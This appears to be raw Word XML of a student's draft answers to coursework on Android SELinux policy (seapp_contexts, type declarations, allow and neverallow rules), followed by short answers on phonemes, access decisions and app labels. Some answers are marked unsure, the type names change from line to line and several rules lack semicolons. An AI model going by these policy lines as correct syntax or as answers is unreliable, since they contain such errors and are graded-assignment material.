      <w:bookmarkStart w:name="OLE_LINK3" w:id="5"/>
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>seapp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_contexts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="4F145031" w:rsidRDefault="6B6343C0" w14:paraId="6976BB3E" w14:textId="3A560FEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="1568133105"/>
      <w:commentRangeStart w:id="939586348"/>
      <w:commentRangeStart w:id="1270138861"/>
      <w:commentRangeStart w:id="68242417"/>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">user=agent </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>seinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>=platform name=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>com.android.secret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain=</w:t>
      </w:r>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>secret_server</w:t>
      </w:r>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> type=</w:t>
      </w:r>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>secret_app_data_file</w:t>
      </w:r>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:commentRangeEnd w:id="1568133105"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="1568133105"/>
      </w:r>
      <w:commentRangeEnd w:id="939586348"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="939586348"/>
      </w:r>
      <w:commentRangeEnd w:id="1270138861"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="1270138861"/>
      </w:r>
      <w:commentRangeEnd w:id="68242417"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="68242417"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="5C8F0487" w14:textId="294AD65C">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">This question has a second part </w:t>
      </w:r>
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">"Also, declare this new type (secret app data file) and associate it with the file type attribute". </w:t>
      </w:r>
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>I'm not sure about this but I think it needs to go in the file.te file again:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="013C7357" w14:textId="670EF579">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>type secret_app_data_file, file_type;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="37B8A99C" w14:textId="5A4BD007">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Part v:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="19A168A2" w14:textId="524F2463">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>In agent_server.te:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="1375A13B" w14:textId="79BFFF13">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>allow agent_server top_secret:file {open}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="0165A64C" w14:textId="65AA838A">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Part vi:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="6B641328" w14:textId="6CAC8F84">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>In secret_server.te:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="5BF72067" w14:textId="4CA7E5ED">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>allow secret_server top_secret:file {read}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="580F3EF8" w14:textId="74CAAFD2">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Part vii:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="71C1E364" w14:textId="6113FEDF">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>In secret_server.te:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="33595D09" w14:textId="116C21C1">
      <w:r w:rsidRPr="5DAC0D75">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">neverallow {domain -agent_server -secret_server} </w:t>
      </w:r>
      <w:r w:rsidRPr="5DAC0D75" w:rsidR="5B3BB482">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>top_</w:t>
      </w:r>
      <w:r w:rsidRPr="5DAC0D75">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r w:rsidRPr="5DAC0D75" w:rsidR="62E8B8CB">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_file</w:t>
      </w:r>
      <w:r w:rsidRPr="5DAC0D75">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:file {open read write}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="256B422F" w14:textId="22E8FC7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5C84CCA9" w:rsidP="7EA872C9" w:rsidRDefault="5C84CCA9" w14:paraId="28BA6A9E" w14:textId="600BF8A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Q2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C84CCA9" w:rsidP="7EA872C9" w:rsidRDefault="5C84CCA9" w14:paraId="5D974CEE" w14:textId="423B1672">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">A) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E078722" w:rsidP="7EA872C9" w:rsidRDefault="3E078722" w14:paraId="4CDEAB9E" w14:textId="71F28628">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>I) B  (unsure)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E078722" w:rsidP="7EA872C9" w:rsidRDefault="3E078722" w14:paraId="14244DAD" w14:textId="59D61D0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Ii) A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E078722" w:rsidP="7EA872C9" w:rsidRDefault="3E078722" w14:paraId="2B5ECBBB" w14:textId="54572A83">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Iii) </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="421E1AB1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="6313DB54" w14:textId="152A51CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="421E1AB1" w:rsidP="7EA872C9" w:rsidRDefault="421E1AB1" w14:paraId="67CD40ED" w14:textId="1505D5A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">B) </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="6BE56D74">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>I) ii) In the slides (lecture 13)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6BE56D74" w:rsidP="7EA872C9" w:rsidRDefault="6BE56D74" w14:paraId="738CF3E9" w14:textId="13FDFD15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="45F17C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Iii) </w:t>
      </w:r>
      <w:r w:rsidRPr="45F17C26" w:rsidR="5DF11666">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>hat</w:t>
      </w:r>
      <w:r w:rsidRPr="45F17C26" w:rsidR="280620CC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, fat</w:t>
      </w:r>
      <w:r w:rsidRPr="45F17C26" w:rsidR="5DF11666">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and cut are very close. Only one </w:t>
      </w:r>
      <w:r w:rsidRPr="45F17C26" w:rsidR="162F6534">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>phoneme difference. Others are less likely to be mixed up</w:t>
      </w:r>
      <w:commentRangeStart w:id="6"/>
      <w:commentRangeEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="6"/>
      </w:r>
      <w:commentRangeStart w:id="7"/>
      <w:commentRangeEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="7"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="0597A412" w14:textId="09FAA133">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="162F6534" w:rsidP="7EA872C9" w:rsidRDefault="162F6534" w14:paraId="414013BF" w14:textId="52F69319">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>C)</w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="727EDAF6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> I)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="727EDAF6" w:rsidP="7EA872C9" w:rsidRDefault="727EDAF6" w14:paraId="38C86A2A" w14:textId="3E4AACFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>NO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="727EDAF6" w:rsidP="7EA872C9" w:rsidRDefault="727EDAF6" w14:paraId="0171C6AA" w14:textId="77A2A530">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>YES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="727EDAF6" w:rsidP="7EA872C9" w:rsidRDefault="727EDAF6" w14:paraId="0C390B93" w14:textId="0D762B29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>NO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="727EDAF6" w:rsidP="7EA872C9" w:rsidRDefault="727EDAF6" w14:paraId="13F2201E" w14:textId="5C7CC800">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>NO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="727EDAF6" w:rsidP="671B0054" w:rsidRDefault="727EDAF6" w14:paraId="66A5248D" w14:textId="562A8D0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="671B0054">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Assuming Admin is 01, YES</w:t>
      </w:r>
      <w:r w:rsidRPr="671B0054" w:rsidR="785FC56B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">   if 01 is speaker, NO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="278BC337" w14:textId="335C1618">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="727EDAF6" w:rsidP="7EA872C9" w:rsidRDefault="727EDAF6" w14:paraId="24A0FA7F" w14:textId="6619336C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Ii) Add app</w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="4F1B17F2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s to Table 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="727EDAF6" w:rsidP="7EA872C9" w:rsidRDefault="727EDAF6" w14:paraId="6A88E0F7" w14:textId="1FCBE3B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>com.deliveroo.driverapp with label 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7A3670BC" w:rsidP="7EA872C9" w:rsidRDefault="7A3670BC" w14:paraId="1456405D" w14:textId="0149C1F0">
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>com.ubercab.driver with label 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="601CA4EE" w14:textId="69799822">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3F97B58D" w:rsidP="7EA872C9" w:rsidRDefault="3F97B58D" w14:paraId="001982E4" w14:textId="29B6B351">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
